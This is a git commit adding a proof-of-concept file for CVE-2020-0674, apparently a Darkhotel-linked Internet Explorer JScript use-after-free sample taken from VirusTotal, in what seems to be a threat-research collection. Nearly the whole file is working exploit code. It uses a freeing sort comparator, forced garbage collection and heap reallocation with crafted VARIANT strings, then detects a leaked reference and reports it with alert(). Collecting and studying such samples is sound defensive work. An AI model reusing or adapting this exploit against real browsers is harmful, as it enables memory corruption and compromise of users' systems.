Create cve-2020-0674.poc

2020-03-02 10:20:33 +08:00
parent 8a1f0ba535
commit b125f15f6d
1 changed files with 201 additions and 0 deletions
--- a/Darkhotel/exploit-attack/cve-2020-0674.poc
+++ b/Darkhotel/exploit-attack/cve-2020-0674.poc
@@ -0,0 +1,201 @@
+from virustotal
+https://www.virustotal.com/gui/file/1ad754caa89e08bb10ce538257879d0775bddd8a74b8ff14aaa3d92a2c35b543/detection
+
+<!DOCTYPE html>
+<html>
+    <head>
+        <meta http-equiv="x-ua-compatible" content="IE=EmulateIE8" />
+        <script language="JScript.Compact">
+
+
+
+var sizeof_WCHAR = 2;
+var sizeof_WORD = 2;
+var sizeof_DWORD = 4;
+var sizeof_PVOID = 4;
+var sizeof_VAR = 0x10;
+var bstrVal = 8;
+var sizeof_RegExpObj = 0xc0;
+var m_pvarMaster = 0x10;
+var m_varCode = 0x38;
+var m_varSrc = 0x48; 
+var m_buf_Rsp = 0x10;
+var lshift = 16;
+
+
+var reSrc = "";
+
+
+function makeVariant(vt, dword1, dword2) {
+	var charCodes = new Array();
+	charCodes.push(vt, 0x00, 0x00, 0x00, dword1 & 0xFFFF, (dword1 >> 16) & 0xFFFF, dword2 & 0xFFFF, (dword2 >> 16) & 0xFFFF);
+	return String.fromCharCode.apply(null, charCodes);
+}
+
+
+var objs = new Array();
+var refs = new Array();
+var nrefs = new Array();
+var rrefs = new Array();
+var erefs = new Array();
+var eerefs = new Array();
+var dummyArrs = new Array();
+var propHolders = new Array();
+var refsCount = 0;
+var refsLimit = 2 * 100 - 4;
+var reallocPropertyNameLength = 0x17a;
+var m = new Array();
+var mod_p = 51;
+
+if (typeof window != "undefined" && typeof WScript == "undefined") {
+	mod_p = 37;
+}
+
+if (typeof window == "undefined" && typeof WScript == "undefined") {
+
+	refsLimit = 100;
+	mod_p = 67;
+}
+
+for (var i = 0; i < 0x1000; i++) {
+	propHolders[i] = new Array();
+}
+
+for (var i = 0; i < refsLimit; i++) {
+	dummyArrs[i] = new Array(1, 2);
+}
+
+var reallocPropertyName = "\u0000\u0000";
+while (reallocPropertyName.length < reallocPropertyNameLength) {
+	reallocPropertyName += makeVariant(0x0082);
+}
+reallocPropertyName += "\u0005";
+
+function FreeingComparator(a, b) {
+	refsCount++;
+
+	if (refsCount >= refsLimit) {
+
+
+		for (var i = 0; i < 100 * 100; i++) {
+			objs[i] = new Object();
+		}
+
+
+		for (var i = 0; i < 100 * 100; i++) {
+			objs[i] = null;
+		}
+
+		CollectGarbage();
+
+
+		for (var i = 0; i < refsLimit; i++) {
+			eerefs[i] = null;
+			if (i % mod_p == 0) {
+				m[i] = null;
+			}
+		}
+		m = null;
+		eerefs = null;
+
+
+		CollectGarbage();
+
+
+		for (var i = 0; i < 0x1000; i++) {
+			propHolders[i][reallocPropertyName] = 1;
+		}
+	}
+	else {
+
+		a = eerefs[refsCount];
+
+		dummyArrs[refsCount].sort(FreeingComparator);
+
+		nrefs.push(a);
+
+	}
+
+	return 0;
+}
+
+
+for (var i = 0; i < refsLimit; i++) {
+	rrefs[i] = new RegExp(reSrc);
+}
+
+
+for (var i = 0; i < refsLimit; i++) {
+	var arr = new Array(rrefs[i]);
+	var e = new Enumerator(arr);
+	e.moveFirst();
+	erefs[i] = e.item();
+	e = null;
+	delete e;
+	arr = null;
+	delete arr;
+}
+
+
+for (var i = 0; i < refsLimit; i++) {
+	var arr = new Array(rrefs[i]);
+	var e = new Enumerator(arr);
+	e.moveFirst();
+	eerefs[i] = e.item();
+	if (i % mod_p == 0) {
+		m[i] = new Array();
+	}
+	e = null;
+	delete e;
+	arr = null;
+	delete arr;
+	rrefs[i] = null;
+	delete rrefs[i];
+}
+
+
+
+dummyArrs[0].sort(FreeingComparator);
+
+
+var srcs = new Array();
+
+for (var i = 0; i < refsLimit; i++) {
+
+	try {
+		throw erefs[i];
+	}
+	catch (r) {
+		srcs[i] = r.source;
+	}
+}
+
+var leakIndex = -1;
+
+for (var i = 0; i < refsLimit; i++) {
+	try {
+
+		if ((typeof nrefs[i]) === "number") {
+			leakIndex = i;
+			break;
+		}
+	}
+	catch (e) {
+
+	}
+}
+
+if (leakIndex == -1) {
+	throw new Error("e dress.");
+}
+else {
+	alert(leakIndex);
+}
+
+
+
+    </script>
+    </head>
+    <body>
+    </body>
+</html>